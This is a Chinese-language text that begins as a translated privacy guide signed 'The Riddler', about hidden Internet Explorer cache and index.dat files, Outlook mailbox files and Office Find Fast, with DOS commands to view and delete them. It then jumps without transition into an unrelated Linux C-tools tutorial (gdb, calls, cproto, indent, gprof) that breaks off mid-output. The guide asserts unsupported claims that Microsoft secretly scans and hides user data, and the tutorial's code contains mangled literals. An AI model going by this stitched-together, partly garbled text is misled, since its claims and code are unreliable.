　　如果你坚持继续使用Microsoft Internet Explorer,那么我推荐你至少要具备以下程序中的一个:
PurgeIE
Anonymizer Window Washer
Cache and Cookie Washer for IE


　　我也曾经尝试和测试了同类的其他的一些程序,如果你知道他们当中不能通过测试的数目, 你可能会大跌眼镜的. 譬如, HistoryKiller 2001宣称他可以清除所有的文件, 但是我奉劝你们不要相信他.
--------------------------------------------------------------------------------
4.逐步带你走近这些隐藏的文件
　　以下的这个部分是为那些对自己计算机的细节部分感兴趣的读者准备的.此部分适用于专业人士.
1)首先,进入DOS模式,在命令行输入以下的命令(全部以小写形式):
c:\windows\explorer /e,c:\windows\tempor~1\content.ie5


　 　你看到那些在"content.ie5"目录下以数字和字母命名的文件了么?这是微软试图通过使用复杂的文件名来使他的计划越发难以理解.(早期版本的 IE仅以"cache#."来命名)这些数字和字母命名的文件夹就是微软生成的用来保存你的cookies和缓存的文件夹.把他们的名字记下来(他们应该 是如此类的样子:6YQ2GSWF, QRMTKLWF, U7YHQKI4, 7YMZ516U, WQK6Z9UV等)如果你在其中任何以个文件夹上双击,什么都不会显示出来,这并不代表着里面没有任何的文件,而是Windows Explorer向你撒谎了.如果你真的想知道这些数字和字母命名的文件夹内的内容,那只能在DOS下面实现了(其实,Skywalker曾教过我一个使 用工作环境来查看其内容的方法,但是有点难以用语言来解释清楚,我承诺会在下一个版本中说清楚这个方法.)
2)重启进入MS-DOS模式(你之所以要重启是因为windows"锁定"了其中的一些文件)
3)在命令行输入以下命令:
CD\WINDOWS\TEMPOR~1\CONTENT.IE5
CD %alphanumeric%
　　(用你刚才所记下的第一个名字来替换%alphanumeric%)
DIR/P
　　注意:你现在进入了一个DOS宣称并不存在的目录,而在这个目录中存放了Windows Explorer宣称并不存在的缓存和cookies.(译者注:说谎的Microsoft!)


　　这些目录就是你发现的硬盘空间减少之谜的直接原因.也许你会发现其中存在一些很有趣的东西:
　 　你所访问过的所有色情网站的图片(译者注:我的计算机里可没有啊 )和其他一些完全是在浪费你的硬盘空间的Internet临时文件如果你使用HOTMAIL(或其他一些页面邮件服务系统),你可以看到你的一些旧信息就 存放在那里,如果自己想再次浏览他们,只要把他们拷贝到其他的目录 然后用你的浏览器打开就可以了.从这些cookies中重新获得你的个人信息非常容易.譬如,你曾经在Amazon.com购过物,那么这里就有你的姓名 和E-MAIL,如果你是Hollywood.com的一个用户,那么这里就有你的城市,国家和邮编MP3.com也保留了类似的信息.那么在进行下一步 骤之前,慢慢享受这些由数字和字母命名的文件夹带给你的"乐趣"吧.
4)输入以下命令:
CD\WINDOWS\TEMPOR~1\CONTENT.IE5
EDIT /75 INDEX.DAT (或者 "EDIT /16 index.dat"


　　你将会看到一个充满二进制串的蓝色编辑界面.
5)按住"Page Down"直到你开始看到一些联接的列表.
　　这些都是你曾经访问过的站点及这些站点的摘要.除了这些联接外,你还会发现他甚至以纯文本的形式纪录了你在搜索引擎所输入的每一个关键字.
6)在你搜索完毕后,你可以选择"File">"Exit"来退出.
　　下面你可以通过输入以下命令来删除这些文件:
7)DELTREE/Y C:\WINDOWS\TEMPOR~1
　　(如果你的TIF文件夹不是C:\WINDOWS\TEMPOR~1的话,就用正确的来替换他)
　　以上这个操作可能也会花费相当长的一段时间,当你完成后,我们来看看你的历史纪录吧.
8)输入以下命令:
CD\WINDOWS\HISTORY\HISTORY.IE5
EDIT /75 INDEX.DAT (或者 "EDIT /16 index.dat"


　　你将会再次看到一个充满二进制串的蓝色编辑界面.
9)按住"Page Down"直到你开始看到一些联接的列表.这些是你曾经访问过的站点的另一个记录.这里可能还存有其他一些东西,如果你还看到什么有意思的东西,你可以发E-MAIL给我.现在我将与你分享一些来自我的index.dat里的片段.
Client UrlCache
MMF Ver 5.2@<!--[if !supportFootnotes]-->[1]<!--[endif]-->
@<!--[if !supportFootnotes]-->

--------------------------------------------------------------------------------
<!--[endif]-->3yia
€

àOD ê:+0
0?
‘?
}*á? 5.t
xt<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->
59
<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->
MS6C:%

<!--[if !supportFootnotes]-->[1]<!--[endif]-->\DAVE'S
HD.TXT
MSIE5.
C:


　　你注意到"C:"和"\DAVE'S HD\MSIE5.TXT"了么?
　　"DAVE"是我计算机里我的用户名,"DAVE'S HD"是我的局域网中的根文件夹.而"MSIE5.TXT"是我计算机里存放的一个文本文件的文件名,其中包含的就是我这项研究的结果,主要是一些联接和注释.
　　你看到这个场面你发现有什么不对劲的了么?天啊!他竟然会对我的硬盘里的文件做手脚!,不光如此,而且他还把这个文件存放在一个即不能用DOS也不能用Windows Explorer发现的地方.这个文件又与我的这个研究相关,难道这仅仅是巧合么?!
　　显然,我的第一个假设就是微软扫描我的硬盘记录任何包含"敏感"字符的信息.在上面的这个例子里,可能是我的"MSIE5.TXT"中包含了一些微软不愿意看到的东西,想要知道我又发现了什么,请参考第8部分"FIND FAST的真正面目".
1)如果这时你还耐着性子看我的文章,那么就输入以下的命令:
CD\WINDOWS\HISTORY


2)找出这些mmXXX.dat(删除他们),再输入以下命令:
CD\WINDOWS\HISTORY\HISTORY.IE5
CD MSHIST~1
EDIT /75 INDEX.DAT (或者 "EDIT /16 index.dat" )


　　你会发现这里有更多你internet历史记录,注意可能这里还有其他的一些mshist~x文件夹.
3)你可以对发现的每一个mshistxx文件重复以上的步骤.
4)看到这你可能忍无可忍的想删除些什么了,那么输入以下的命令:
CD WINDOWS
DELTREE/Y HISTORY


　　我所知道的就这么多了,如果你使用Outlook的话,你可以再检查一下你的*.mbx文件(dir *.mbx/s),在下一章节我们将更加深入的继续我们的讨论.
--------------------------------------------------------------------------------
5.看看OUTLOOK EXPRESS的真正面目
　 　好好想想如果你的所有的E-MAIL信息都被暗中的记录下来的话,你会怎么说?E-MAIL记录保留了你所说的一切记录,即使你已经使用OUTLOOK 来 进行过删除操作.你被OUTLOOK蒙骗了,以为自己进行过2次删除,那么那些信息就理应彻底的从这个世界里消失了.首先,OUTLOOK先将你的删除的 文件移到一个"删除的项目"文件夹中,在你清空这个文件夹的时候,OUTLOOK只是"假装"你要删除的文件真正的从你的计算机里被物理删除了,而事实 是,你所删除的文件只是被暗中存放在一个"深度隐藏"的文件夹中.
　　更有甚者,OUTLOOK EXPRESS还将你的每一个E-MAIL的附件的信息暗中存放在一个加过密的数据库内.天啊!你能相信这是真的么?!
　　我们来做一个试验,我将一个ZIP文件作为附件发送给我自己的电子邮箱.
PK<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]--><!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->'...?*}??P<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->AAA-à?€ ??-83PK<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]--><!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->+...?*8?M3P
<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->BBB-à?€ ×?%-83PK<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]--><!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->....?*??.?P<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->CCC-à?€ ??!-83PK<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->
<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->2...?*2?`P<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->DDD-à?€ ù?-83PK<!--[if !supportFootnotes]-->[1]<!--[endif]-->
'...?*}??P<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->
AAAPK<!--[if !supportFootnotes]-->[1]<!--[endif]-->+...?*8?M3P
<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]--> 1BBBPK<!--[if !supportFootnotes]-->[1]<!--[endif]-->
....?*??.?P<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]--> bCCCPK<!--[if !supportFootnotes]-->[1]<!--[endif]-->2...?*2?`P
<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->
"DDDPK<!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]--><!--[if !supportFootnotes]-->
--------------------------------------------------------------------------------
<!--[endif]-->??


　　这样这个文件的信息就在我的inbox.mbx和outbox.mbx文件中都有记录了.
UEsDBBQAAAAIACeFjip9jZkaEAAAAFAAAAADAAAAQUFBrcCBAAAAAIAg1vgpljizAFBLAwQUA AAACAArh
Y4qOPhNMxAAAABQAAAAAwAAAEJCQq3AgQAAAACAINf4JZY4swBQSwMEFAAAAAgA LoWOKsTWLp0QAAAAUA
AAAAMAAABDQ0OtwIEAAAAAgCDY+CGWOLMAUEsDBBQAAAAIADKF jiqyEuVgEAAAAFAAAAADAAAARERErcC
BAAAAAIAg2fgdljizAFBLAQIUABQAAAAIACeFjip9jZkaEAA AAFAAAAADAAAAAAAAAAEAIAAAAAAAAABB
QUFQSwECFAAUAAAACAArhY4qOPhNMxAAAABQ AAAAAwAAAAAAAAABACAAAAAxAAAAQkJCUEsBAhQAFAAAA
AgALoWOKsTWLp0QAAAAUAAAA AMAAAAAAAAAAQAgAAAAYgAAAENDQ1BLAQIUABQAAAAIADKFjiqyEuVgEA
AAAFAAAAADAAAA AAAAAAEAIAAAAJMAAABERERQSwUGAAAAAAQABADEAAAAxAAAAAAA


　　希望有人能尽早的把解密算法注册出来.
　　看到这,你也许急着知道,究竟这些记录都存放在什么地方,别急,他们就存放在这个地方:
c:\program files\internet mail and news\%user%\mail\*.mbx
(用你的用户名来替换其中的%user%)


　　如果你走运的话,你会发现在以下的目录里也有他们的身影:
c:\windows\application data\microsoft\outlook\mail\*.mbx


　　我第一次安装OUTLOOK的时候,我只在"internet mail and news."目录里找到了以上的文件,而当我卸载OUTLOOK又重新安装他时,这些文件又被存放到了"application data"文件夹中.
　　想要删除这些暗中保留的信息,你只要输入以下的命令(当然如果你执行了这些删除操作你所有的E-MAIL信息也就消失了,所以请先备份重要的信息)
Deltree c:\windows\intern~1\%user%\mail


　　或者
Deltree c:\windows\applic~1\micros~1\outloo~1\mail


--------------------------------------------------------------------------------
6.微软是如何做到这些的
　　不知你可曾考虑微软是如何让这些文件在DOS和Windows Explorer中都不可见的?我曾经一度非常困惑,因为即使我使用DOS6.2的启动盘来启动计算机仍然看不到这些文件.这个问题困扰了我很久,但是最终我还是在这些文件夹中找到了原因.
　 　"desktop.ini"是一个文件夹中的标准文本文件,用来定制一类文件夹行为的某些特定的方面.在这个方面,微软使用"desktop.ini" 文 件来使得这些文件不可见.使这些文件对于Windows Explorer,DOS,"查找功能"都不可见.(这就是你为什么不能在这些文件夹中执行"查找"功能的原因了)
　　这里有一些例子:
　　在c:\windows\temporary internet files\desktop.ini和c:\windows\temporary internet files\content.ie5\desktop.ini文件中都可以找到以下的一些代码:
[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
和
[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
CLSID={FF393560-C2A7-11CF-BFF4-444553540000}


　　其中的UICLSID键值使的这个文件夹在DOS和Explorer中都不可见,而CLSID则禁用了这个文件夹中的查找功能.除此之外,他们还让这些文件夹表现为"历史"状态.(如果你仔细研究了这些东西,你会明白我的意思的)
　 　在删除了"desktop.ini"文件后,DOS和Windows Explorer又恢复了正确显示这个文件夹的功能.问题是,在你计算机的下一次重启时,windows会重新生成这个"desktop.ini"文件. 解决的办法是编辑"desktop.ini"文件,删除除了[.ShellClassInfo]以外的所有内容.这样可以欺骗过windows,让他以为 自己已经恢复了这个文件,而不会再次去生成"desktop.ini"文件.
  顺便提醒一下,如果你想删除你的注册表中的这个键值,这些文件夹同样不会显示出来.但是,我仍然坚信总会有人能找出一个彻底的解决微软在你的计算机里"深度隐藏"文件的办法.
--------------------------------------------------------------------------------
7.+s代表隐秘而不是系统
　　现在有3个关于DOS的简单的是或否问题.就象你为了得到你的A+证明一样耐着性子做做看吧:
1)是或否:在根目录下执行dir/s会显示你的硬盘中的所有正常属性的文件和文件夹. 正确答案是:" 是! "
2)是或否:在根目录下执行dir/s/ah会显示你的硬盘中的所有隐藏属性的文件和文件夹. 正确答案同样是:" 是! "
3)是或否:在根目录下执行dir/s/as会显示你的硬盘中的所有系统属性的文件和文件夹. 正确答案同样是:" 那只是你这样认为的! "
　　当DOS想要获得任何包含一个系统属性的子目录的文件列表时,就会遇到一个无形的阻挡墙.这不仅意味着微软采取了特殊的防范以阻止人们找到这些系统文件,而且使得参数中的第一个"/s"也完全失效,"真狠啊!"
　　如果你还不明白,不妨来做以个小试验来看看我究竟是什么意思.
　　因为content.ie5和history.ie5文件夹都是包含系统属性,正确的查找命令应该如下:
CD\
DIR *.IE5 /s/as


　　屏幕会显示"No files found"的错误信息.
　　这就证明了所有包含系统属性的文件或文件夹都不讳被显示出来,但是请相信我,他们确实存在!
　　现在,最有趣的地方就是你可以绕过这个无形的阻挡墙.方法就是,一旦你进入了一个系统目录,那么这个阻挡墙在列目录的时候就会失效.譬如:
CD\WINDOWS\TEMPOR~1
DIR *.IE5 /as

1 folder(s) found.


　　现在,你就可以看到他们了(但是条件是你知道他们的确切的位置).换句话说,如果你不事先知道这些文件夹的存在,那么你就别想找到他们!
--------------------------------------------------------------------------------
8.FIND FAST的真正面目
　　你是否考虑过,为什么"FIND FAST"程序会出现在你的控制面板里?我曾经花费了一个小时在microsoft.com阅读帮助文件,但是我仍然不知道这个程序有什么用处.下面就是我在microsoft.com上找到的关于"FIND FAST"的信息片段.
　　"FIND FAST索引是用来加速在微软OFFICE程序包括微软OUTLOOK里执行"打开"或者"打开OFFICE文档"的速度的工具."
　 　这究竟是什么意思?好,如果你再次仔细的阅读这个片段,你会看到,微软并没有提到任何会加快"查找"速度的词语.事实上是,他和"查找:文件或程序"功 能 没有任何关系.我想微软想表达的真正意思是说当你在微软WORD中选择"文件">"打开"时,你的文档列表会更快的显示出来.
　　如果他们所说的真是我以上表达的意思的话,微软又撒了一个谎言!我希望你不会认为我是在对微软断章取义.我只是试图让你明白微软所做的一切只是想让这个"FIND FAST"看上去是为了加快查找速度而存在的.
　 　譬如,如果你在微软的WORD里选择"编辑"你会发现在其中有一个"FAST FIND"图标(望远镜图标).这是一个与"FIND FAST"明显有关系的暗示的程序.但是如果你再读一遍那段片段,你会发现其中只字未提在一个文档查找词语,而他的意思是查找文档本身.这里还有一些来自 微软的片段:
　　"FIND FAST索引会默认记录在硬盘中的所有的WORD文档,当其中的一个文档被移动后,FIND FAST索引会自动更新自己的索引."
　　"索引是用于在OFFICE程序中更快的找到文件."
　　"FIND FAST索引会在你安装微软OFFICE97时自动被安装到你的计算机里.FIND FAST索引会加快你在微软OFFICE程序中选择打开文件对话框时查找文件的速度"
　　看了以上的这些片段,你以为你知道了事情的真相了么?!
　 　如果我告诉你FIND FAST实际上是在扫描和索引你的硬盘上的所有文件,你会不会惊讶呢?!你是否还记得在OFFICE95中,FIND FAST索引有个过滤列表其中包括".exe,.swp,.dll和其他一些扩展名"呢?难道这个功能被取消了?!如果你是一位程序员,那么在你为 FIND FAST做过滤列表时,你会选择所有的文件和是单单带有OFFICE扩展名的呢?!
　　这里还有一些很有趣的真相:
　　 FIND FAST在每一次启动时都会自动运行(因为他被添加到了你的启动组中).如果你在磁盘扫描的过程中出错(由于"磁盘写"问题),那么就是因为FIND FAST在后台悄悄的为你的硬盘进行索引.这里还有一个很好的例子说明微软费尽苦心阻止人们发现FIND FAST正在悄悄的索引你的硬盘(微软总是很擅长找借口来掩饰).我引用如下:
　　"当你想通过生成索引对话框制定了需要索引的文档类型时,那么下表中列出了所有类型的文档."
Doc Type File Name Extension
Microsoft Office files All the Microsoft Excel, Microsoft Web documents PowerPoint,
Microsoft Project, and Microsoft Word document types listed in this table.
Microsoft Binder (.odb, .obt) and Microsoft Access (.mdb) files. Note that in .mdb files,
only document properties are indexed.
Microsoft Excel workbooks .xl* files
Microsoft PowerPoint files .ppt (presentation), .pot (template), .pps
(auto-running presentation) files
Microsoft Project files .mpp, .mpw, .mpt, .mpx, .mpd files
Microsoft Word documents .doc (document), .dot (template), .ht* (Hypertext
Markup Language document), .txt (text file), .rtf (Rich Text format) files
All files *.* files


　　你注意到最后的一部分了么?假设你是一个非常有钱的人,你准备买下商店里的每一辆车.那么你会说:
a)"我想买所有的红色,所有的蓝色,所有的银色,所有的白色,所有的香槟色,和所有的车."或者
b)"我想买下所有的车."
　　正如你看到的一样,微软不想让人们意识到FIND FAST正在索引你的整个硬盘,他们只是带着你说"我想买所有的红色,所有的蓝色,所有的银色..."
　 　我个人发现这个"FIND FAST索引"在我将他从我的"启动组"里删除后又偷偷的溜进了我的"启动组".不可能是我故意这么做的,除非我先建立一个FIND FAST的快捷方式,然后在把这个快捷方式手工的移到我的"启动组"里,因为在在FIND FAST程序里并没有任何可以将其加入"启动组"的选项.
　　那么我如何来弥补这个后门呢?!难道我没有这样想过?但是就算我做了了,这也无法改变他所带来的不可弥补的矛盾.譬如:
1)进入DOS模式
2)CD\
3)DIR FF*.* /AH(这将显示所有和FIND FAST有关的文件)
4)edit /75 %ff%(将上面显示的所有文件名替换%ff%)


　　注意到了这些难以置信的数量文件指向"深度隐藏"的文件夹"Temporary Internet Files"了么?那么究竟FIND FAST要对这些"深度隐藏"的文件夹做些什么呢?!
--------------------------------------------------------------------------------
8.1删除FIND FAST
1)重启你的计算机进入MS-DOS模式
2)从c:\windows\system删除FindFast.CPL文件
3)删除c:\windows\start menu\programs\startup里的快捷方式
4)从c:\progra~1\micros~1\office删除FindFast.EXE文件
　　还有一些相关的文件也可以安全删除:
5)FFNT.exe, FFSetup.dll, FFService.dll, FFast_bb.dll, 以及c:>ff*.*文件
　　你会发现在你删除这些文件后你并没有丧失任何功能,实际上你重新是获得了你该有的功能.
--------------------------------------------------------------------------------
9.看看微软为了防止人们发现这些隐藏的文件而尽了多大的努力
　 　如果上面所说的"desktop.ini"文件还不能充分的说明的话(天啊,我是不知道desktop.ini文件还可以让文件夹不可见!),如果你认 为对于系统文件夹来说DOS中的"/s"实效仅仅是"bug"而已,如果你认为微软在这些"深度隐藏"的文件夹中屏蔽"查找"功能只是为了节省你的时间的 话(哈哈哈),那么你就去Hackers.com的BBS上去再搜索一下这个关键字吧,不会让你失望的!!
--------------------------------------------------------------------------------
10.最终注解和联系方式
　　这个指导会一直更新,如果你有什么建议的话,可以发E-MAIL给我,我会在以后的版本中把你的建议融合进去.你可能会发现在这篇指导中,很多地方要求你能联系我.这是因为我想知道事情的点点滴滴.正因为如此,我抛弃了以前的版本,请确认你所阅读的是最新版本.
　　我的E-MAIL地址将会在下面给出.也许你的来信不能及时的回复,但是我保证回复所有发给我的E-MAIL.顺便说一下,出于安全考虑,我删除了我的PGP.如果你想私下里联系我,我相信我们会做出点成效的.
感谢阅读本文-----The Riddler
E-MAIL:mailtther1ddler@f u c k m i c r o s o f t.c o m
网址:http://www.hackers.com/bulletin/ ;
--------------------------------------------------------------------------------
10.1推荐阅读
　　如果你还没有尽兴,我象你强烈推荐下面的这些站点或文章:
http://www.theregister.co.uk/content/4/18002.html ;
http://www.findarticles.com/m0CGN/3741/55695355/p1/article.jhtml ;
http://www.mobtown.org/news/archive/msg00492.html ;
http://194.159.40.109/05069801.htm ;
http://www.yarbles.demon.co.uk/mssniff.html ;
http://www.macintouch.com/o98security.html ;
http://www.theregister.co.uk/content/archive/3079.html ;
http://www.fsm.nl/ward/ ;
http://slashdot.org/ ;
http://www.peacefire.org/ ;
http://stopcarnivore.org/ ;
http://nomorefakenews.com/ ;
http://grc.com/steve.htm#project-x
--------------------------------------------------------------------------------
11.特别鸣谢
　　感谢Skywalker,给我提供及时到位的帮助,你是目前唯一有兴趣帮我深入我的研究的人.
　　感谢所有特地发E-MAIL给我鼓励我的人,你们的这些话语对我来说意义重大,给了我完成这篇文章的巨大动力.
　　感谢Hackers.com,感谢为我们提供了这样一个充满了交流气氛的站点,没有Hackers.com,也就不会有我这篇指导的存在
--------------------------------------------------------------------------------
12.参考联接
http://support.microsoft.com/support/kb/articles/Q137/1/13.asp ;
http://support.microsoft.com/support/kb/articles/Q136/3/86.asp ;
http://support.microsoft.com/support/kb/articles/Q169/5/31.ASP ;
http://support.microsoft.com/support/kb/articles/Q141/0/12.asp ;
http://support.microsoft.com/support/kb/articles/Q205/2/89.ASP ;
http://support.microsoft.com/support/kb/articles/Q166/3/02.ASP ;
http://www.insecure.org/sploits/ ;
http://www.parascope.com/cgi-bin ;
http://www.hackers.com/bulletin/ ;
http://slashdot.org/articles/00/05/11/173257.shtml ;
http://peacefire.org/ ;

　 根据列出的源程序, 你能看到要设断点的地方在第26行, 在 gdb 命令行提示符下键入如
下命令设置断点:

(gdb) break 26
gdb 将作出如下的响应:

Breakpoint 1 at 0x804857c: file hello.c, line 26.

(gdb)

现在再键入 run 命令, 将产生如下的输出:

Starting program: /root/hello

The string is hello world!

Breakpoint 1, my_print2 (string=0xbffffab0 "hello world!") at hello.c:26
26 string2[size - i] = string[i];
你能通过设置一个观察 string2[size - i] 变量的值的观察点来看出错误是怎样产生的,
做法是键入:

(gdb) watch string2[size - i]
gdb 将作出如下回应:

Hardware watchpoint 2: string2[size - i]
现在可以用 next 命令来一步步的执行 for 循环了:

(gdb) next
经过第一次循环后, gdb 告诉我们 string2[size - i] 的值是 `h`. gdb 用如下的显示
来告诉你这个信息:

Hardware watchpoint 2: string2[size - i]

Old value = 0 '00'
New value = 104 'h'
my_print2 (string=0xbffffab0 "hello world!") at hello.c:25
25 for (i = 0; i < size; i++)
这个值正是期望的. 后来的数次循环的结果都是正确的. 当 i=11 时, 表达式
string2[size - i] 的值等于 `!`, size - i 的值等于 1, 最后一个字符已经拷到新串
里了.

如果你再把循环执行下去, 你会看到已经没有值分配给 string2[0] 了, 而它是新串的
第一个字符, 因为 malloc 函数在分配内存时把它们初始化为空(null)字符. 所以
string2 的第一个字符是空字符. 这解释了为什么在打印 string2 时没有任何输出了.

现在找出了问题出在哪里, 修正这个错误是很容易的. 你得把代码里写入 string2 的第
一个字符的的偏移量改为 size - 1 而不是 size. 这是因为 string2 的大小为 12, 但
起始偏移量是 0, 串内的字符从偏移量 0 到 偏移量 10, 偏移量 11 为空字符保留.

改正方法非常简单. 这是这种解决办法的代码:

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()
{
char my_string[] = "hello world!";
my_print (my_string);
my_print2 (my_string);
}

void my_print (char *string)
{
printf ("The string is %s ", string);
}

void my_print2 (char *string)
{
char *string2;
int size, i;

size = strlen (string);
string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++)
string2[size -1 - i] = string[i];
string2[size] = '';

printf ("The string printed backward is %s ", string2);
}
如果程序产生了core文件，可以用gdb hello core命令来查看程序在何处出错。如在函数
my_print2()中，如果忘记了给string2分配内存 string2 = (char *) malloc (size +
1);，很可能就会core dump.

另外的 C 编程工具

xxgdb
xxgdb 是 gdb 的一个基于 X Window 系统的图形界面. xxgdb 包括了命令行版的 gdb
上的所有特性. xxgdb 使你能通过按按钮来执行常用的命令. 设置了断点的地方也用图
形来显示.

你能在一个 Xterm 窗口里键入下面的命令来运行它:

xxgdb
你能用 gdb 里任何有效的命令行选项来初始化 xxgdb . 此外 xxgdb 也有一些特有的命
令行选项, 表 27.2 列出了这些选项.

表 27.2. xxgdb 命令行选项.

选 项 描 述
db_name 指定所用调试器的名字, 缺省是 gdb.
db_prompt 指定调试器提示符, 缺省为 gdb.
gdbinit 指定初始化 gdb 的命令文件的文件名, 缺省为 .gdbinit.

nx 告诉 xxgdb 不执行 .gdbinit 文件.
bigicon 使用大图标.

calls
你可以在 sunsite.unc.edu FTP 站点用下面的路径:
/pub/Linux/devel/lang/c/calls.tar.Z
来取得 calls , 一些旧版本的 Linux CD-ROM 发行版里也附带有. 因为它是一个有用的
工具, 我们在这里也介绍一下. 如果你觉得有用的话, 从 BBS, FTP, 或另一张CD-ROM 上
弄一个拷贝. calls 调用 GCC 的预处理器来处理给出的源程序文件, 然后输出这些文件
的里的函数调用树图.

注意: 在你的系统上安装 calls , 以超级用户身份登录后执行下面的步骤: 1. 解压和
untar 文件. 2. cd 进入 calls untar 后建立的子目录. 3. 把名叫 calls 的文件移动
到 /usr/bin 目录. 4. 把名叫 calls.1 的文件移动到目录 /usr/man/man1 . 5. 删除
/tmp/calls 目录. 这些步骤将把 calls 程序和它的指南页安装载你的系统上.

------------------------------------------------------------------------------
--

当 calls 打印出调用跟踪结果时, 它在函数后面用中括号给出了函数所在文件的文件名:

main [hello.c]
如果函数并不是向 calls 给出的文件里的, calls 不知道所调用的函数来自哪里, 则只
显示函数的名字:

printf
calls 不对递归和静态函数输出. 递归函数显示成下面的样子:

fact <<< recursive in factorial.c >>>
静态函数象这样显示:

total [static in calculate.c]
作为一个例子, 假设用 calls 处理下面的程序:

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()
{
char my_string[] = "hello world!";
my_print (my_string);
my_print2 (my_string);
my_print (my_string);
}

void count_sum()
{
int i,sum=0;
for(i=0; i<1000000; i++)
sum += i;
}

void my_print (char *string)
{
count_sum();
printf ("The string is %s ", string);
}

void my_print2 (char *string)
{
char *string2;
int size, i,sum =0;

count_sum();
size = strlen (string);
string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++) string2[size -1 - i] = string[i];
string2[size] = '';
for(i=0; i<5000000; i++)
sum += i;

printf ("The string printed backward is %s ", string2);
}
将产生如下的输出:

1 __underflow [hello.c]
2 main
3 my_print [hello.c]
4 count_sum [hello.c]
5 printf
6 my_print2 [hello.c]
7 count_sum
8 strlen
9 malloc
10 printf
calls 有很多命令行选项来设置不同的输出格式, 有关这些选项的更多信息请参考 calls
的指南页. 方法是在命令行上键入 calls -h .

calltree
calltree与calls类似，初了输出函数调用树图外，还有其它详细的信息。
可以从sunsite.unc.edu FTP 站点用下面的路径
:/pub/Linux/devel/lang/c/calltree.tar.gz得到calltree.

cproto
cproto 读入 C 源程序文件并自动为每个函数产生原型申明. 用 cproto 可以在写程序时
为你节省大量用来定义函数原型的时间.
如果你让 cproto 处理下面的代码(cproto hello.c):

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()
{
char my_string[] = "hello world!";
my_print (my_string);
my_print2 (my_string);
}

void my_print (char *string)
{
printf ("The string is %s ", string);
}

void my_print2 (char *string)
{
char *string2;
int size, i;

size = strlen (string);
string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++)
string2[size -1 - i] = string[i];
string2[size] = '';

printf ("The string printed backward is %s ", string2);
}
你将得到下面的输出:

/* hello.c */

int main(void);

int my_print(char *string);

int my_print2(char *string);
这个输出可以重定向到一个定义函数原型的包含文件里.

indent
indent 实用程序是 Linux 里包含的另一个编程实用工具. 这个工具简单的说就为你的代
码产生美观的缩进的格式. indent 也有很多选项来指定如何格式化你的源代码.这些选项
的更多信息请看indent 的指南页, 在命令行上键入 indent -h .

下面的例子是 indent 的缺省输出:

运行 indent 以前的 C 代码:

#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()
{
char my_string[] = "hello world!";
my_print (my_string);
my_print2 (my_string);
}

void my_print (char *string)
{
printf ("The string is %s ", string);
}

void my_print2 (char *string)
{
char *string2; int size, i;

size = strlen (string);
string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++) string2[size -1 - i] = string[i];
string2[size] = '';

printf ("The string printed backward is %s ", string2);
}
运行 indent 后的 C 代码:

#include <stdio.h>
static void my_print (char *);
static void my_print2 (char *);
main ()
{
char my_string[] = "hello world!";
my_print (my_string);
my_print2 (my_string);
}
void
my_print (char *string)
{
printf ("The string is %s ", string);
}
void
my_print2 (char *string)
{
char *string2;
int size, i;
size = strlen (string);
string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++)
string2[size - 1 - i] = string[i];
string2[size] = '';
printf ("The string printed backward is %s ", string2);
}
indent 并不改变代码的实质内容, 而只是改变代码的外观. 使它变得更可读, 这永远是
一件好事.

gprof
gprof 是安装在你的 Linux 系统的 /usr/bin 目录下的一个程序. 它使你能剖析你的程
序从而知道程序的哪一个部分在执行时最费时间.

gprof 将告诉你程序里每个函数被调用的次数和每个函数执行时所占时间的百分比. 你如
果想提高你的程序性能的话这些信息非常有用.

为了在你的程序上使用 gprof, 你必须在编译程序时加上 -pg 选项. 这将使程序在每次
执行时产生一个叫 gmon.out 的文件. gprof 用这个文件产生剖析信息.

在你运行了你的程序并产生了 gmon.out 文件后你能用下面的命令获得剖析信息:

gprof <program_name>
参数 program_name 是产生 gmon.out 文件的程序的名字.

为了说明问题，在程序中增加了函数count_sum()以消耗CPU时间，程序如下
#include <stdio.h>

static void my_print (char *);
static void my_print2 (char *);

main ()
{
char my_string[] = "hello world!";
my_print (my_string);
my_print2 (my_string);
my_print (my_string);
}

void count_sum()
{
int i,sum=0;
for(i=0; i<1000000; i++)
sum += i;
}

void my_print (char *string)
{
count_sum();
printf ("The string is %s ", string);
}

void my_print2 (char *string)
{
char *string2;
int size, i,sum =0;

count_sum();
size = strlen (string);
string2 = (char *) malloc (size + 1);
for (i = 0; i < size; i++) string2[size -1 - i] = string[i];
string2[size] = '';
for(i=0; i<5000000; i++)
sum += i;

printf ("The string printed backward is %s ", string2);
}
$ gcc -pg -o hello hello.c
$ ./hello
$ gprof hello | more
将产生以下的输出
Flat profile:

Each sample counts as 0.01 seconds.
% cumulative self self total
time seconds seconds calls us/call us/call name
